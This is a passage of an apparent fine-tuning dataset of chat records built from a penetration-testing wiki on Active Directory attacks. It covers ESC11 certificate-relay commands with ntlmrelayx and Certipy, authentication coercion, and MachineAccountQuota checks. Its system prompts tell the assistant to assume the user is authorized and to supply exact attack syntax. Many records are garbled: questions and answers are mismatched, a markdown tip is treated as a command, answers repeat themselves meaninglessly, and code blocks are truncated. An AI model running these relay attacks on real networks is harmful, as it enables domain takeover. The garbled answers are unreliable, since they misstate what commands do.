commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute find and look through enabled templates for ones that could be used for authentication?", "response": "> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The `-scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n**2. Authentication coercion :chains:**\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. [PrinterBug](../mitm-and-coerced-authentications/ms-rprn.md), [PetitPotam](../mitm-and-coerced-authentications/ms-efsr.md), [PrivExchange](../exchange-services/privexchange.md)) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the [mitm-and-coerced-authentications](../mitm-and-coerced-authentications/) article for more insight.\n\n---\n\n**3. Loot :tada:**\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with [Pass-the-Certificate](../kerberos/pass-the-certificate.md) to obtain a TGT and authenticate.\n\n\n=== Windows\n\nFrom Windows systems, the [Certify](https://github.com/GhostPack/Certify) (C#) tool can be used to enumerate enabled web endpoints (both HTTP and HTTPS).", "metadata": {"corpus_index": 190, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for find and look through enabled templates for ones that could be used for authentication. find and look through enabled templates for ones that could be used for authentication"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for find and look through enabled templates for ones that could be used for authentication. find and look through enabled templates for ones that could be used for authentication", "metadata": {"corpus_index": 190, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Unsigned endpoints - RPC endpoint (ESC11)"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n1. Relay servers setup :toolbox:\n\nFrom UNIX-like systems, Impacket's ntlmrelayx (Python) can be used to conduct the ESC11 escalation scenario.\n\n``bash\nntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\"\n`\n\n> [!TIP]\n> The certificate template flag (i.e. --template) can either be left blank (defaults to Machine or User whether relayed account name ends with $) or chosen among the certificate templates that fill the requirements.\n> \n> For instance, if the relayed principal is a domain controller, the DomainController template must be specified.\n\nCertipy (Python) can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.) and identify a vulnerable RPC endpoint (how to enumerate).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Unsigned endpoints - RPC endpoint (ESC11)", "response": "::: tabs\n\n=== UNIX-like\n\n1. Relay servers setup :toolbox:\n\nFrom UNIX-like systems, Impacket's ntlmrelayx (Python) can be used to conduct the ESC11 escalation scenario.\n\n``bash\nntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\"\n`\n\n> [!TIP]\n> The certificate template flag (i.e. --template) can either be left blank (defaults to Machine or User whether relayed account name ends with $) or chosen among the certificate templates that fill the requirements.\n> \n> For instance, if the relayed principal is a domain controller, the DomainController template must be specified.\n\nCertipy (Python) can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.) and identify a vulnerable RPC endpoint (how to enumerate).\n\n``bash", "metadata": {"corpus_index": 191, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Unsigned endpoints - RPC endpoint (ESC11)?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\n1. Relay servers setup :toolbox:\n\nFrom UNIX-like systems, Impacket's ntlmrelayx (Python) can be used to conduct the ESC11 escalation scenario.\n\n``bash\nntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\"\n`\n\n> [!TIP]\n> The certificate template flag (i.e. --template) can either be left blank (defaults to Machine or User whether relayed account name ends with $) or chosen among the certificate templates that fill the requirements.\n> \n> For instance, if the relayed principal is a domain controller, the DomainController template must be specified.\n\nCertipy (Python) can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.) and identify a vulnerable RPC endpoint (how to enumerate).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Unsigned endpoints - RPC endpoint (ESC11)?", "response": "::: tabs\n\n=== UNIX-like\n\n1. Relay servers setup :toolbox:\n\nFrom UNIX-like systems, Impacket's ntlmrelayx (Python) can be used to conduct the ESC11 escalation scenario.\n\n``bash\nntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\"\n`\n\n> [!TIP]\n> The certificate template flag (i.e. --template) can either be left blank (defaults to Machine or User whether relayed account name ends with $) or chosen among the certificate templates that fill the requirements.\n> \n> For instance, if the relayed principal is a domain controller, the DomainController template must be specified.\n\nCertipy (Python) can be used to enumerate information regarding the certificate templates (EKUs allowing for authentication, allowing low-priv users to enroll, etc.) and identify a vulnerable RPC endpoint (how to enumerate).\n\n``bash", "metadata": {"corpus_index": 191, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the ntlmrelayx command for unsigned endpoints - rpc endpoint (esc11)"}, {"role": "assistant", "content": "ntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the ntlmrelayx command for unsigned endpoints - rpc endpoint (esc11)", "response": "ntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\"", "metadata": {"corpus_index": 192, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntlmrelayx"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Unsigned endpoints - RPC endpoint (ESC11)"}, {"role": "assistant", "content": "ntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Unsigned endpoints - RPC endpoint (ESC11)", "response": "ntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\"", "metadata": {"corpus_index": 192, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\"`?"}, {"role": "assistant", "content": "This command is used for unsigned endpoints - rpc endpoint (esc11). RPC endpoint (ESC11)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntlmrelayx -t rpc://$PKI.domain.local -rpc-mode ICPR -icpr-ca-name $CA_NAME -smb2support --template \"Template name\"`?", "response": "This command is used for unsigned endpoints - rpc endpoint (esc11). RPC endpoint (ESC11)", "metadata": {"corpus_index": 192, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is find ESC11-vulnerable CAs?"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep -B20 ESC11"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is find ESC11-vulnerable CAs?", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep -B20 ESC11", "metadata": {"corpus_index": 193, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for find ESC11-vulnerable CAs?"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep -B20 ESC11"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for find ESC11-vulnerable CAs?", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout | grep -B20 ESC11", "metadata": {"corpus_index": 193, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe find and look through enabled templates for ones that could be used for authentication in the context of penetration testing"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout -enabled\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n2. Authentication coercion :chains:\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. PrinterBug, PetitPotam, PrivExchange) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the mitm-and-coerced-authentications article for more insight.\n\n---\n\n3. Loot :tada:\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\n_From Windows systems, at the time of writing (April 24th, 2024) no tool permits to identify and exploit the ESC11 vulnerability. Look at the UNIX-like tab to perform the exploitation._\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe find and look through enabled templates for ones that could be used for authentication in the context of penetration testing", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout -enabled\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n2. Authentication coercion :chains:\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. PrinterBug, PetitPotam, PrivExchange) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the mitm-and-coerced-authentications article for more insight.\n\n---\n\n3. Loot :tada:\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\n_From Windows systems, at the time of writing (April 24th, 2024) no tool permits to identify and exploit the ESC11 vulnerability. Look at the UNIX-like tab to perform the exploitation._\n\n:::", "metadata": {"corpus_index": 194, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for find and look through enabled templates for ones that could be used for authentication"}, {"role": "assistant", "content": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout -enabled\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n2. Authentication coercion :chains:\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. PrinterBug, PetitPotam, PrivExchange) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the mitm-and-coerced-authentications article for more insight.\n\n---\n\n3. Loot :tada:\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\n_From Windows systems, at the time of writing (April 24th, 2024) no tool permits to identify and exploit the ESC11 vulnerability. Look at the UNIX-like tab to perform the exploitation._\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for find and look through enabled templates for ones that could be used for authentication", "response": "certipy find -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -stdout -enabled\n``\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme` flag can be used to set whether to use LDAP or LDAPS.\n\n---\n\n2. Authentication coercion :chains:\n\nJust like any other NTLM relay attack, once the relay servers are running and waiting for incoming NTLM authentications, authentication coercion techniques can be used (e.g. PrinterBug, PetitPotam, PrivExchange) to force accounts/machines to authenticate to the relay servers.\n\n> [!TIP]\n> Read the mitm-and-coerced-authentications article for more insight.\n\n---\n\n3. Loot :tada:\n\nOnce incoming NTLM authentications are relayed and authenticated sessions abused, base64-encoded PFX certificates will be obtained and usable with Pass-the-Certificate to obtain a TGT and authenticate.\n\n=== Windows\n\n_From Windows systems, at the time of writing (April 24th, 2024) no tool permits to identify and exploit the ESC11 vulnerability. Look at the UNIX-like tab to perform the exploitation._\n\n:::", "metadata": {"corpus_index": 194, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/unsigned-endpoints.md", "page_title": "Unsigned endpoints", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of MachineAccountQuota - Theory"}, {"role": "assistant", "content": "> MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain (source)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of MachineAccountQuota - Theory", "response": "> MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain (source)", "metadata": {"corpus_index": 195, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MachineAccountQuota - Theory"}, {"role": "assistant", "content": "> MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain (source)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MachineAccountQuota - Theory", "response": "> MachineAccountQuota (MAQ) is a domain level attribute that by default permits unprivileged users to attach up to 10 computers to an Active Directory (AD) domain (source)", "metadata": {"corpus_index": 195, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of MachineAccountQuota - Practice"}, {"role": "assistant", "content": "There are multiple ways attackers can leverage that power.\n\n* Force client authentications, relay those authentications to domain controllers using LDAPS, and take advantage of authenticated sessions to create a domain computer account. This account can then be used as a foothold on the AD domain to operate authenticated recon (i.e. with BloodHound for example)\n* Create a computer account and use it for Kerberos RBCD attacks when leveraging owned accounts with sufficient permissions (i.e. ACEs like GenericAll, GenericWrite or WriteProperty) against a target machine\n* Create a computer account and use it for a Kerberos Unconstrained Delegation attack when leveraging owned accounts with sufficient permissions (i.e. the SeEnableDelegationPrivilege user right)\n* Profit from special rights that members of the Domain Computers group could inherit\n* Profit from special rights that could automatically be applied to new domain computers based on their account name"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of MachineAccountQuota - Practice", "response": "There are multiple ways attackers can leverage that power.\n\n* Force client authentications, relay those authentications to domain controllers using LDAPS, and take advantage of authenticated sessions to create a domain computer account. This account can then be used as a foothold on the AD domain to operate authenticated recon (i.e. with BloodHound for example)\n* Create a computer account and use it for Kerberos RBCD attacks when leveraging owned accounts with sufficient permissions (i.e. ACEs like GenericAll, GenericWrite or WriteProperty) against a target machine\n* Create a computer account and use it for a Kerberos Unconstrained Delegation attack when leveraging owned accounts with sufficient permissions (i.e. the SeEnableDelegationPrivilege user right)\n* Profit from special rights that members of the Domain Computers group could inherit\n* Profit from special rights that could automatically be applied to new domain computers based on their account name", "metadata": {"corpus_index": 196, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute MachineAccountQuota - Practice?"}, {"role": "assistant", "content": "There are multiple ways attackers can leverage that power.\n\n* Force client authentications, relay those authentications to domain controllers using LDAPS, and take advantage of authenticated sessions to create a domain computer account. This account can then be used as a foothold on the AD domain to operate authenticated recon (i.e. with BloodHound for example)\n* Create a computer account and use it for Kerberos RBCD attacks when leveraging owned accounts with sufficient permissions (i.e. ACEs like GenericAll, GenericWrite or WriteProperty) against a target machine\n* Create a computer account and use it for a Kerberos Unconstrained Delegation attack when leveraging owned accounts with sufficient permissions (i.e. the SeEnableDelegationPrivilege user right)\n* Profit from special rights that members of the Domain Computers group could inherit\n* Profit from special rights that could automatically be applied to new domain computers based on their account name"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute MachineAccountQuota - Practice?", "response": "There are multiple ways attackers can leverage that power.\n\n* Force client authentications, relay those authentications to domain controllers using LDAPS, and take advantage of authenticated sessions to create a domain computer account. This account can then be used as a foothold on the AD domain to operate authenticated recon (i.e. with BloodHound for example)\n* Create a computer account and use it for Kerberos RBCD attacks when leveraging owned accounts with sufficient permissions (i.e. ACEs like GenericAll, GenericWrite or WriteProperty) against a target machine\n* Create a computer account and use it for a Kerberos Unconstrained Delegation attack when leveraging owned accounts with sufficient permissions (i.e. the SeEnableDelegationPrivilege user right)\n* Profit from special rights that members of the Domain Computers group could inherit\n* Profit from special rights that could automatically be applied to new domain computers based on their account name", "metadata": {"corpus_index": 196, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does MachineAccountQuota - Check the value work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nThe MachineAccountQuota module (for NetExec (Python)) can be used to check the value of the MachineAccountQuota attribute:\n\n``bash\nnxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq\n`\n\nAlternatively, it can be done manually with the Python library ldap3 (source):\n\n`bash\nimport ldap3\n\ntarget_dn = \"DC=domain,DC=local\" # change this\ndomain = \"domain\" # change this\nusername = \"username\" # change this\npassword = \"password\" # change this\n\nuser = \"{}\\\\{}\".format(domain, username)\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn,\"(objectClass=*)\", attributes=['ms-DS-MachineAccountQuota'])\nprint(connection.entries[0])\n`\n\nWith bloodyAD (Python):\n\n`bash\nbloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota\n`\n\nWith ldeep (Python):\n\n`bash\nldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'\n`\n\nWith ldapsearch (openldap (C)):\n\n`bash\nldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota \n`\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the user impersonation part.\n\nThe following command, using the PowerShell ActiveDirectory module's cmdlets Get-ADDomain and Get-ADObject, will help testers make sure the controlled domain user can create computer accounts (the MachineAccountQuota domain-level attribute needs to be set higher than 0. It is set to 10 by default).\n\n`powershell\nGet-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'\n`\n\nFuzzSecurity's StandIn project is an alternative in C# (.NET assembly) to perform some AD post-compromise operations."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does MachineAccountQuota - Check the value work?", "response": "::: tabs\n\n=== UNIX-like\n\nThe MachineAccountQuota module (for NetExec (Python)) can be used to check the value of the MachineAccountQuota attribute:\n\n``bash\nnxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq\n`\n\nAlternatively, it can be done manually with the Python library ldap3 (source):\n\n`bash\nimport ldap3\n\ntarget_dn = \"DC=domain,DC=local\" # change this\ndomain = \"domain\" # change this\nusername = \"username\" # change this\npassword = \"password\" # change this\n\nuser = \"{}\\\\{}\".format(domain, username)\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn,\"(objectClass=*)\", attributes=['ms-DS-MachineAccountQuota'])\nprint(connection.entries[0])\n`\n\nWith bloodyAD (Python):\n\n`bash\nbloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota\n`\n\nWith ldeep (Python):\n\n`bash\nldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'\n`\n\nWith ldapsearch (openldap (C)):\n\n`bash\nldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota \n`\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the user impersonation part.\n\nThe following command, using the PowerShell ActiveDirectory module's cmdlets Get-ADDomain and Get-ADObject, will help testers make sure the controlled domain user can create computer accounts (the MachineAccountQuota domain-level attribute needs to be set higher than 0. It is set to 10 by default).\n\n`powershell\nGet-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'\n`\n\nFuzzSecurity's StandIn project is an alternative in C# (.NET assembly) to perform some AD post-compromise operations.", "metadata": {"corpus_index": 197, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for MachineAccountQuota - Check the value?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nThe MachineAccountQuota module (for NetExec (Python)) can be used to check the value of the MachineAccountQuota attribute:\n\n``bash\nnxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq\n`\n\nAlternatively, it can be done manually with the Python library ldap3 (source):\n\n`bash\nimport ldap3\n\ntarget_dn = \"DC=domain,DC=local\" # change this\ndomain = \"domain\" # change this\nusername = \"username\" # change this\npassword = \"password\" # change this\n\nuser = \"{}\\\\{}\".format(domain, username)\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn,\"(objectClass=*)\", attributes=['ms-DS-MachineAccountQuota'])\nprint(connection.entries[0])\n`\n\nWith bloodyAD (Python):\n\n`bash\nbloodyad -d $DOMAIN -u $USER -p $PASSWORD --host $DOMAIN_CONTROLLER get object 'DC=acme,DC=local' --attr ms-DS-MachineAccountQuota\n`\n\nWith ldeep (Python):\n\n`bash\nldeep ldap -d $DOMAIN -u $USER -p $PASSWORD -s $DOMAIN_CONTROLLER search '(objectclass=domain)' | jq '.[].\"ms-DS-MachineAccountQuota\"'\n`\n\nWith ldapsearch (openldap (C)):\n\n`bash\nldapsearch -x -H ldap://$DOMAIN_CONTROLLER -b 'DC=acme,DC=local' -D \"$USER@$DOMAIN\" -W -s sub \"(objectclass=domain)\" | grep ms-DS-MachineAccountQuota \n`\n\n=== Windows\n\nIn order to run the following commands and tools as other users, testers can check the user impersonation part.\n\nThe following command, using the PowerShell ActiveDirectory module's cmdlets Get-ADDomain and Get-ADObject, will help testers make sure the controlled domain user can create computer accounts (the MachineAccountQuota domain-level attribute needs to be set higher than 0. It is set to 10 by default).\n\n`powershell\nGet-ADDomain | Select-Object -ExpandProperty DistinguishedName | Get-ADObject -Properties 'ms-DS-MachineAccountQuota'\n`\n\nFuzzSecurity's StandIn project is an alternative in C# (.NET assembly) to perform some AD post-compromise operations."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for MachineAccountQuota - Check the 